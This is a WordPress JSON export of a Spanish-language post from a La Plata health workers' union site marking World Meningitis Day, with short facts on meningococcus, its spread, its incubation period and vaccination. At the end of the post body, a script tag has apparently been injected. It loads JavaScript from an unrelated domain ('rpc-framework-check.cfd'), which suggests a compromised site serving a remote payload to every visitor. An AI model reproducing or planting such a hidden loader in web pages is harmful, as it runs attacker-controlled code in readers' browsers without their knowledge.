{"id":18391,"date":"2025-04-24T14:04:41","date_gmt":"2025-04-24T17:04:41","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18391"},"modified":"2026-02-02T17:14:14","modified_gmt":"2026-02-02T20:14:14","slug":"dia-mundial-de-la-lucha-contra-la-meningitis","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/04\/dia-mundial-de-la-lucha-contra-la-meningitis\/","title":{"rendered":"D\u00eda Mundial de la Lucha contra la Meningitis"},"content":{"rendered":"\n<p>La enfermedad es producida por una bacteria llamada meningococo, que afecta mayormente a ni\u00f1os menores de cinco a\u00f1os y con menor frecuencia a personas adultas.<\/p>\n\n\n\n<p>La propagaci\u00f3n se ve facilitada por el contacto estrecho y prolongado con una persona infectada.<\/p>\n\n\n\n<p>El periodo de incubaci\u00f3n medio es de 4 d\u00edas, pero puede oscilar entre 2 y 10 d\u00edas.<\/p>\n\n\n\n<p>\ud83d\udc49Esta fecha busca generar conciencia sobre la gravedad de esta enfermedad y la importancia de su prevenci\u00f3n, especialmente mediante la vacunaci\u00f3n.<\/p>\n\n\n\n<p>#SanidadAtsaLaPlata #SiempreJuntoAVos<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>La enfermedad es producida por una bacteria llamada meningococo, que afecta mayormente a ni\u00f1os menores&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18392,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,85,148],"tags":[],"class_list":["post-18391","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18391"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18391\/revisions"}],"predecessor-version":[{"id":20833,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18391\/revisions\/20833"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18392"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18391"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}